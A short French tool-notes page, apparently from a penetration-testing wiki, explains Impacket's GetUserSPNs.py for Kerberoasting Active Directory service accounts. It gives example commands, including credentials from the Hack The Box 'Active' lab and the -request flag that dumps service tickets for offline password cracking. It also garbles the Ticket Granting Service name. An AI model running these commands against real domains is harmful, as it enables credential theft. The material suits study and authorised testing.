GetUserSPNs Outils

GetUserSPNs.py

Cet outil fait partie de la suite Impacket, utilisée pour des tests de sécurité et des audits Active Directory. Il exploite la vulnérabilité Kerberoasting, qui permet d’extraire des tickets de service (TGS) pour des comptes configurés avec des SPNs (Service Principal Names).

Exemple :

GetUserSPNs.py domain.local/username:password

Cette commande permet de récupérer un ticket de service Grant-Ticketing Service (TGS) exploitant la vulnérabilité.

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18

Ajout du paramètre -request : Ce paramètre télécharge directement les tickets TGS pour une attaque hors ligne.

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?